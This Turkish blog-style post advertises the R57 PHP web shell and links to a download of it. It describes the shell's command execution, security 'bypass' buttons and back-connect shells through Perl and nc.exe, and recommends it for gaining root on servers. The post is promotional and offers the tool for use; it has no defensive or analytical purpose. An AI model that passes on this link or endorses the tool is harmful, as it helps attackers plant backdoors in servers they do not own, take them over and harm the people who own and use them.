R57 Shell PHP

Güncellenmiş ve Günümüze Update edilmiş Efsanevi R57 Shell sizlerle..

En çok tercih edilen ve her zaman vazgeçilmez olan r57 shell hemen indirebilir ve sorunsuz, hatasız bir şekilde kullanabilirsiniz.. keyifli sörfler.

R57 Shell Türkiye’de en çok kullanılan php shell’lerden bir tanesidir en çok tercih edilmesinin başlıca sebepleri, kaliteli tasarımı ve piyasaya sürülen ilk materyallerden bir tanesidir.

Oldukça gelişmiş ve içerisinde bütün fonksiyonları barındırmaktadır çeşitli r57 shell sürümleri zaman zaman çıkmıştır ve geliştirilmiştir fakat hepsi zaman içerisinde veya arşivlerde kalmıştır.

Sunucu geçişleri için eşssiz komut çalıştırma fonksiyonu bulunmakta bunun yanında çeşitli bypass butonları ve sunucu hakkında çeşitli bilgiler bulunmaktadır.

Download: http://shellpub.net/shellz/priv-r57shell.txt

Kolay Kullanım

Tasarımı ve Türkçe olması işinizi oldukça kolaylaştırır. İçerisinde pek çok özelliği barındırması ayrıca bir avantajdır.

Server Rootlamak İçin İdeal

Eğer sunucu rootlamak istiyorsanız işinizi r57 shell fazlasıyla görecektir. Back-connect fonksiyonları Perl gibi methodlar ile nc.exe vasıtasıyla erişim imkanına sahip olabilirsiniz. Fakat piyasa da çok daha gelişmiş php scriptler mevcuttur.

İlk yorum yapan olun

Bir yanıt bırakın

E-posta hesabınız yayımlanmayacak.


*